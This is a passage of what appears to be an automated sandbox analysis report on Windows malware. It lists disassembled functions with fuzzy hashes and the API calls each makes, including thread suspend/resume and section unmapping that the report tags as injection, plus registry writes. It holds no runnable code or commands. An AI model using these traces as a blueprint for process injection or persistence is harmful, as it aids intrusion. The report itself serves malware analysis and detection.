  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5B7B, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 25memory
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D892D, Relevance: 6.1, APIs: 4, Instructions: 93 Total matches: 207
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
